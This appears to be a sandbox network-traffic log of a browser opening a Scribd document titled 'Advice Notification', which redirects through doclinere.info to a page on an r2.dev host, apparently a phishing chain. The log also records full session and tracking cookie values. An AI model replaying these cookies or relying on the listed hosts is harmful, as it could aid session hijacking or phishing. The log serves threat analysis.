    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/219.4025f4.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/265007.gif?tm=74&r=874168399&v=111&cs=UTF-8&h=www.scribd.com&l=en-US&S=5e543256c480ac577d30f76f9120eb74&uu=88cc5efd775d85316f8301f58ee373f&t=Advice%20Notification%20%7C%20PDF&u=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&nm=2&mh=63196a00446a1e285d1992cfe444aa55&np=5&ph=332b72bdb211e34e6e3c24f88d7c393b&sh=1024&sw=1280&cd=24&p=Win32&to=300&d=60&ce=true&tp=0&ol=true&pr=Gecko&ps=20030107&vd=Google%20Inc.&hc=4&je=false&ss=true&ls=true&in=true&db=false&tl=false&tr=false&ts=false&tb=false&ab=false&cf=864980724ce0e4610faf43e7780d8361&fph=487f7b22f68312d2c1bbc93b1aea445b&fsh=1024&fsw=1280&fcd=24&fp=Win32&ftp=0&fhc=4&fss=true&fls=true&fin=true&fvch=487f7b22f68312d2c1bbc93b1aea445b&fad=124.04347527516074&z=z HTTP/1.1Host: hexagon-analytics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/282187/envelope/?sentry_key=21588782029b459685064c03453673ff&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.19.0 HTTP/1.1Host: sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vn/re.htm HTTP/1.1Host: doclinere.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c; _rdt_uuid=1733522373804.90ad4cc1-c7c0-404a-8932-712d98b9d875; IR_gbd=scribd.com; IR_14808=1733522374271%7C0%7C1733522374271%7C%7C; _uetsid=61d3cba0b41d11ef9aea290cc24698a9; _uetvid=61d42620b41d11ef884d05fafe2184f7; _ga=GA1.2.30215218.1733522367; _gid=GA1.2.830502526.1733522377; __ssid=88cc5efd775d85316f8301f58ee373f; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.1.1733522381.46.0.0; _ga_Z4ZC50DED6=GS1.1.1733522367.1.1.1733522381.46.0.0; _fbp=fb.1.1733522382001.679305698926452788; _tt_enable_cookie=1; _ttp=M5jx_JzCNLWicY7qEO5VYLqIGGL.tt.1
    Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/991817613/?random=1733522375967&cv=11&fst=1733522375967&bg=ffffff&guid=ON&async=1&gtm=45be4c40v9178425511z878386455za201zb78386455&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification&hn=www.googleadservices.com&frm=0&tiba=Advice%20Notification%20%7C%20PDF&npa=0&us_privacy=1-N-&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkWUFsQvLQZk-4EI3fKIPjT4lq3O8BPJ3KYlT3sCMuMlsncJozI1dPMcGxO
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/205.e3b3b6.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/768.555ee4.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/450.f2b337.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/452.fc7ddf.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/806.acb1c9.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/265007.gif?tm=74&r=874168399&v=111&cs=UTF-8&h=www.scribd.com&l=en-US&S=5e543256c480ac577d30f76f9120eb74&uu=88cc5efd775d85316f8301f58ee373f&t=Advice%20Notification%20%7C%20PDF&u=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&nm=2&mh=63196a00446a1e285d1992cfe444aa55&np=5&ph=332b72bdb211e34e6e3c24f88d7c393b&sh=1024&sw=1280&cd=24&p=Win32&to=300&d=60&ce=true&tp=0&ol=true&pr=Gecko&ps=20030107&vd=Google%20Inc.&hc=4&je=false&ss=true&ls=true&in=true&db=false&tl=false&tr=false&ts=false&tb=false&ab=false&cf=864980724ce0e4610faf43e7780d8361&fph=487f7b22f68312d2c1bbc93b1aea445b&fsh=1024&fsw=1280&fcd=24&fp=Win32&ftp=0&fhc=4&fss=true&fls=true&fin=true&fvch=487f7b22f68312d2c1bbc93b1aea445b&fad=124.04347527516074&z=z HTTP/1.1Host: hexagon-analytics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1Host: m.stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=4cfeb51b-755d-40fb-be12-ca2bf6a8f0c603c5ba
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/152.a74e3e.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/74.705300.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/196.c6862c.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/827.8397d2.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/479.72a596.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/719.ee32f5.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vn/re.htm HTTP/1.1Host: doclinere.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://doclinere.info/vn/re.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: g5nmOHNdaOtSdHM42keuH2EVuRs=jRannCw4KdJg6NuIs7JSgkRiehM; 5LaCBW8cV9MPvcVPjMTA3ZUufLE=1733522376; 6E8TyGemGbB-OAipAn0qZd221jc=1733608776; nOiEzJswY_t7WKIobKIXYyEDPLA=pqz120LriAB_Ja2Lx4Z-vjcLP8Y; Rl06aH4fX9vZMGkIzqvuIqkogTQ=j_kjWSwmHzXY4WG5lvUnbln9SD8; 7Pzur7Jwby9wUerDAxYrzzf8tCk=j6yULiTE1iXXHUVNwDs_ThwPui0; so5lz-GOXHyPtI18gfPiLQbF3-c=1733522387; MwdCZVHJdqUzd7xrOdLTbPbT4ks=1733608787; L469B6KTz_IIGR79zMMAglZiTP0=1MWKxWnTzVhpWRnGaEFv-dvaTe8
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/258.72204b.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: doclinere.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: g5nmOHNdaOtSdHM42keuH2EVuRs=jRannCw4KdJg6NuIs7JSgkRiehM; 5LaCBW8cV9MPvcVPjMTA3ZUufLE=1733522376; 6E8TyGemGbB-OAipAn0qZd221jc=1733608776; nOiEzJswY_t7WKIobKIXYyEDPLA=pqz120LriAB_Ja2Lx4Z-vjcLP8Y; Rl06aH4fX9vZMGkIzqvuIqkogTQ=j_kjWSwmHzXY4WG5lvUnbln9SD8; 7Pzur7Jwby9wUerDAxYrzzf8tCk=j6yULiTE1iXXHUVNwDs_ThwPui0
    Source: global trafficHTTP traffic detected: GET /tr/?id=287045611447707&ev=PageView&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&rl=&if=false&ts=1733522382007&sw=1280&sh=1024&v=2.9.178&r=stable&a=tmSimo-GTM-WebTemplate&ec=0&o=4126&fbp=fb.1.1733522382001.679305698926452788&cs_est=true&ler=empty&cdl=API_unavailable&it=1733522370298&coo=false&tm=1&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=287045611447707&ev=PageView&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&rl=&if=false&ts=1733522382007&sw=1280&sh=1024&v=2.9.178&r=stable&a=tmSimo-GTM-WebTemplate&ec=0&o=4126&fbp=fb.1.1733522382001.679305698926452788&cs_est=true&ler=empty&cdl=API_unavailable&it=1733522370298&coo=false&tm=1&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-sourceReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dri.html HTTP/1.1Host: pub-28cbd5bc68cb4c26b93f263849a029cc.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://doclinere.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tr/?id=287045611447707&ev=PageView&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&rl=&if=false&ts=1733522382007&sw=1280&sh=1024&v=2.9.178&r=stable&a=tmSimo-GTM-WebTemplate&ec=0&o=4126&fbp=fb.1.1733522382001.679305698926452788&cs_est=true&ler=empty&cdl=API_unavailable&it=1733522370298&coo=false&tm=1&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
